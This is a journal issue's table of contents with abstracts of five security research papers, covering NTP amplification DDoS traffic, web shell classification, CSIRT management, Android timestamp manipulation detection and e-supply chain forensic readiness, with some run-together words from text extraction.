ARJ  Volume 107 No 2

Download the cover (Editorial Board Information) (~1.38 MB)

Table of Contents (1.55 MB)

Jump to Paper:

1. Characterization and Analysis of NTP Amplifier Traffic

2. Detecting Derivative Malware Samples using Deobfuscation-Assisted Similarity Analysis

3. A  Management Model for Building a Computer Security Incident Response Capability

4. A Reference Architecture for Android Applications to Support the Detection of Manipulated Evidence

5. Using a Standard Approach to the Design of next Generation E-Supply Chain Digital Forensic Readiness Systems 

Characterization and Analysis of NTP Amplifier Traffic
by L. Rudman and B. Irwin

Abstract:Network Time Protocol based DDoS attacks saw a lot of popularity throughout 2014. This papershowsthecharacterizationandanalysisoftwolargedatasetscontainingpacketsfromNTPbased DDoS attacks captured in South Africa. Using a series of Python based tools, the dataset is analysed accordingtospeci?cpartsofthepacketheaders. TheseincludethesourceIPaddressandTime-to-Live (TTL) values. The analysis found the top source addresses and looked at the TTL values observed for each address. These TTL values can be used to calculate the probable operating system or DDoS attack tool used by an attacker. We found that each TTL value seen for an address can indicate the number of hosts attacking the address or indicate minor routing changes. The Time-to-Live values are then analysed as a whole to ?nd the total number used throughout each attack. The most frequent TTL values are then found and show that the majority of them indicate the attackers are using an initial TTL of255. ThisvaluecanindicatetheuseofacertainDDoStoolthatcreatespacketswiththatexactinitial TTL. The TTL values are then put into groups that can show the number of IP addresses a group of hosts are targeting. The paper discusses our work with two brief case studies correlating observed data to real-world attacks, and the observable impact thereof.

Download Paper-1.76MB

DETECTING DERIVATIVE MALWARE SAMPLES USING DEOBFUSCATION-ASSISTEDSIMILARITY ANALYSIS
by P.Wrench and B.Irwin

Abstract:The abundance of PHP-based Remote Access Trojans (or web shells) found in the wild has led malware researchers to develop systems capable of tracking and analysing these shells. In the past, such shells were ably classi?ed using signature matching, a process that is currently unable to cope withthesheervolumeandvarietyofweb-basedmalwareincirculation. Althoughalargepercentageof newly-created webshellsoftwareincorporatesportions ofcode derived fromseminalshellssuch asc99 and r57, they are able to disguise this by making extensive use of obfuscation techniques intended to frustrate any attempts to dissect or reverse engineer the code. This paper presents an approach to shell classi?cation and analysis (based on similarity to a body of known malware) in an attempt to create a comprehensive taxonomy of PHP-based web shells. Several different measures of similarity were used in conjunction with clustering algorithms and visualisation techniques in order to achieve this. Furthermore, an auxiliary component capable of syntactically deobfuscating PHP code is described. This was employed to reverse idiomatic obfuscation constructs used by software authors. It was found that this deobfuscation dramatically increased the observed levels of similarity by exposing additional code for analysis.

A MANAGEMENT MODEL FOR BUILDING A COMPUTER SECURITY INCIDENT RESPONSE CAPABILITY
by RoderickD.Mooi and Reinhardt A.Botha

Abstract:Although there are numerous guides available for establishing a computer security incident responsecapability,thereappearstobenounderlyingmanagementmodelthatbringsthemalltogether. ThispaperaimstoaddresstheproblembydevelopingamanagementmodelforestablishingaComputer Security Incident Response Team (CSIRT). A design science-based approach has been selected for the overall project. However, the current paper reports on the ?rst three activities in design science research: identifyingtheproblem,listingsolutionobjectives,anddesigninganddevelopingamodel. A comprehensiveliteraturereviewservestwopurposes: tocon?rmtheproblemandtoprovideastructured way of revealing the requirement areas. Following the uncovering of the requirement areas, CSIRT businessrequirementsandservicesareintroduced,beforeexploringtherelationshipsbetweentheareas using argumentation. This culminates in the development of the management model in two parts: a strategicviewandatacticalview. Thestrategicviewcomprisesthebusinessrequirementsand“higher” leveldecisions–theenvironment,constituencyandfundingconsiderations–thatneedtobemadewhen establishingaCSIRT.Thetacticalviewfollowsbypresentingthe“how”considerations. Together,these two views provide an holistic model for establishing a CSIRT by parties interested in doing so.

REFERENCE ARCHITECTURE FOR ANDROID APPLICATIONS TO SUPPORT THE DETECTION OF MANIPULATED EVIDENCE
by H.Pieterse, M.S.Olivier and R.P.vanHeerden

Abstract:Traces found on Android smartphones form a signi?cant part of digital investigations. A key component of these traces is the date and time, often formed as timestamps. These timestamps allow the examiner to relate the traces found on Android smartphones to some real event that took place. This paper performs exploratory experiments that involve the manipulation of timestamps found in SQLite databases on Android smartphones. Based on observations, speci?c heuristics are identi?ed that may allow for the identi?cation of manipulated timestamps. To overcome the limitations of these heuristics, a new reference architecture for Android applications is also introduced. The reference architecture provides examiners with a better understanding of Android applications as well as the associated digital evidence. The results presented in the paper show that the suggested techniques to establish the authenticity and accuracy of digital evidence are feasible

Using a standard approach to the design of next generation e-Supply Chain Digital Forensic Readiness systems
byD.J.E. Masvosvere and H.S. Venter

Abstract: The internet has had a major impact on how information is shared within supply chains, and in commerce in general. This has resulted in the establishment of information systems such as esupply chains (eSCs) amongst others which integrate the internet and other information and communications technology (ICT) with traditional business processes for the swift transmission of information between trading partners. Many organisations have reaped the benefits that come from adopting the eSC model, but have also faced the challenges with which it comes. One such major challenge is information security. With the current state of cybercrime, system developers are challenged with the task of developing cutting edge digital forensic readiness (DFR) systems that can keep up with current technological advancements, such as (eSCs). Hence, the problem addressed in this paper is the lack of a well-formulated DFR approach that can assist system developers in the development of e-supply chain digital forensic readiness systems. The main objective of such a system being that it must be able to provide law enforcement/digital forensic investigators (DFI) with forensically sound and readily available potential digital evidence that can expedite and support digital forensics incident response processes. This approach, if implemented can also prepare trading partners for security incidents that might take place, if not prevent them from occurring. Therefore, the work presented in this paper is aimed at providing a procedural approach that is based on digital forensics principles. This paper discusses the limitations of current system monitoring tools in relation to the kind of specialised DFR systems that are needed in the eSC environment and proposes an eSCDFR process model and architectural design model that can lead to the development of nextgeneration eSC DFR systems. It is the view of the authors that the conclusions drawn from this paper can spearhead the development of cutting-edge next-generation digital forensic readiness systems, and bring attention to some of the shortcomings of current system monitoring tools.